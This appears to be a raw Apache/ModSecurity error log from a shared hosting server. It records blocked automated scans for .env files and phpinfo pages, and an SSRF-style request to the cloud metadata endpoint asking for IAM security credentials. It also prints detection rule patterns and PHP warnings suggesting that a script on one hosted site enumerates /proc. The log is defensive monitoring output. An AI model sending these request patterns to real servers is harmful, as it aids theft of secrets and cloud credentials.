[Tue May 12 01:27:44.370070 2026] [security2:error] [pid 1691274:tid 1691286] [client 45.148.10.246:15628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.bak"] [unique_id "agJl8FfdQaraX_prmqcIEAAAAAk"]
[Tue May 12 01:27:44.370257 2026] [security2:error] [pid 1691274:tid 1691286] [client 45.148.10.246:15628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.bak"] [unique_id "agJl8FfdQaraX_prmqcIEAAAAAk"]
[Tue May 12 01:27:44.370410 2026] [security2:error] [pid 1707624:tid 1707699] [client 45.148.10.246:15640] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/_next/image"] [unique_id "agJl8LOxS7i6i_mT2NKxxAAAAFE"]
[Tue May 12 01:27:44.370696 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.save"] [unique_id "agJl8LvMumyrWMfSu7qSQAAAAMk"]
[Tue May 12 01:27:44.370810 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.save"] [unique_id "agJl8LvMumyrWMfSu7qSQAAAAMk"]
[Tue May 12 01:27:44.370984 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.save"] [unique_id "agJl8LvMumyrWMfSu7qSQAAAAMk"]
[Tue May 12 01:27:44.411533 2026] [security2:error] [pid 1691274:tid 1691299] [client 45.148.10.246:15636] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJl8FfdQaraX_prmqcIEgAAABg"]
[Tue May 12 01:27:44.412511 2026] [security2:error] [pid 1691274:tid 1691299] [client 45.148.10.246:15636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJl8FfdQaraX_prmqcIEgAAABg"]
[Tue May 12 01:27:44.412792 2026] [security2:error] [pid 1691274:tid 1691299] [client 45.148.10.246:15636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJl8FfdQaraX_prmqcIEgAAABg"]
[Tue May 12 01:27:44.431491 2026] [security2:error] [pid 1709071:tid 1709089] [client 45.148.10.246:15548] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJl8LvMumyrWMfSu7qSSgAAAMI"]
[Tue May 12 01:27:44.432058 2026] [security2:error] [pid 1709071:tid 1709089] [client 45.148.10.246:15548] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJl8LvMumyrWMfSu7qSSgAAAMI"]
[Tue May 12 01:27:44.432246 2026] [security2:error] [pid 1709071:tid 1709089] [client 45.148.10.246:15548] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/_next/image/"] [unique_id "agJl8LvMumyrWMfSu7qSSgAAAMI"]
[Tue May 12 01:27:44.448413 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8LvMumyrWMfSu7qSSwAAAMk"]
[Tue May 12 01:27:44.448529 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8LvMumyrWMfSu7qSSwAAAMk"]
[Tue May 12 01:27:44.448737 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8LvMumyrWMfSu7qSSwAAAMk"]
[Tue May 12 01:27:44.468269 2026] [security2:error] [pid 1695975:tid 1695981] [client 45.148.10.246:15624] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJl8NVI9ymHBxup7492nwAAAIM"]
[Tue May 12 01:27:44.468269 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8NVI9ymHBxup7492ngAAAIQ"]
[Tue May 12 01:27:44.468488 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8NVI9ymHBxup7492ngAAAIQ"]
[Tue May 12 01:27:44.468489 2026] [security2:error] [pid 1695975:tid 1695981] [client 45.148.10.246:15624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJl8NVI9ymHBxup7492nwAAAIM"]
[Tue May 12 01:27:44.468726 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8NVI9ymHBxup7492ngAAAIQ"]
[Tue May 12 01:27:44.468727 2026] [security2:error] [pid 1695975:tid 1695981] [client 45.148.10.246:15624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJl8NVI9ymHBxup7492nwAAAIM"]
[Tue May 12 01:27:44.492548 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8NVI9ymHBxup7492oAAAAIQ"]
[Tue May 12 01:27:44.492766 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8NVI9ymHBxup7492oAAAAIQ"]
[Tue May 12 01:27:44.493044 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8NVI9ymHBxup7492oAAAAIQ"]
[Tue May 12 01:27:44.514566 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/php_info.php
[Tue May 12 01:27:44.515009 2026] [security2:error] [pid 1709071:tid 1709089] [client 45.148.10.246:15548] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJl8LvMumyrWMfSu7qSTQAAAMI"]
[Tue May 12 01:27:44.515129 2026] [security2:error] [pid 1709071:tid 1709089] [client 45.148.10.246:15548] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJl8LvMumyrWMfSu7qSTQAAAMI"]
[Tue May 12 01:27:44.515350 2026] [security2:error] [pid 1709071:tid 1709089] [client 45.148.10.246:15548] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJl8LvMumyrWMfSu7qSTQAAAMI"]
[Tue May 12 01:27:44.532466 2026] [security2:error] [pid 1709071:tid 1709089] [client 45.148.10.246:15548] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJl8LvMumyrWMfSu7qSTgAAAMI"]
[Tue May 12 01:27:44.532579 2026] [security2:error] [pid 1709071:tid 1709089] [client 45.148.10.246:15548] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJl8LvMumyrWMfSu7qSTgAAAMI"]
[Tue May 12 01:27:44.532777 2026] [security2:error] [pid 1709071:tid 1709089] [client 45.148.10.246:15548] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJl8LvMumyrWMfSu7qSTgAAAMI"]
[Tue May 12 01:27:44.537906 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/php-info.php
[Tue May 12 01:27:44.559055 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/test.php
[Tue May 12 01:27:44.581990 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/php.php
[Tue May 12 01:27:44.601294 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/i.php
[Tue May 12 01:27:44.620967 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/p.php
[Tue May 12 01:27:44.640222 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/pi.php
[Tue May 12 01:27:44.659934 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/infophp.php
[Tue May 12 01:27:44.679478 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/sysinfo.php
[Tue May 12 01:27:44.698746 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/server-info.php
[Tue May 12 01:27:44.718250 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/server-status.php
[Tue May 12 01:27:53.763077 2026] [security2:error] [pid 1695975:tid 1695985] [client 129.226.174.80:39702] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/2023/09/"] [unique_id "agJl-dVI9ymHBxup7492pwAAAIc"]
[Tue May 12 01:27:54.668166 2026] [security2:error] [pid 1691274:tid 1691291] [client 176.65.139.236:40476] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJl-lfdQaraX_prmqcIGwAAAA8"]
[Tue May 12 01:27:54.668421 2026] [security2:error] [pid 1691274:tid 1691291] [client 176.65.139.236:40476] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJl-lfdQaraX_prmqcIGwAAAA8"]
[Tue May 12 01:27:54.668661 2026] [security2:error] [pid 1691274:tid 1691291] [client 176.65.139.236:40476] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agJl-lfdQaraX_prmqcIGwAAAA8"]
[Tue May 12 01:28:07.083256 2026] [security2:error] [pid 1695975:tid 1695978] [client 146.56.199.139:43896] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/"] [unique_id "agJmB9VI9ymHBxup7492vgAAAIA"], referer: http://www.apoe.fr
[Tue May 12 01:28:12.561210 2026] [authz_core:error] [pid 1695975:tid 1695990] [client 47.128.23.4:54862] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/Requests/Transport/error_log
[Tue May 12 01:28:15.210771 2026] [security2:error] [pid 1707624:tid 1707686] [client 43.159.128.247:44228] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/telechargements/"] [unique_id "agJmD7OxS7i6i_mT2NKx9gAAAEQ"]
[Tue May 12 01:29:02.552224 2026] [authz_core:error] [pid 1630927:tid 1630934] [client 47.128.23.195:44524] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/Requests/Response/error_log
PHP Warning:  filesize(): stat failed for /proc/78/task/78/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/78/task/78/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/78/task/78/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/78/task/78/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/78/task/78/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
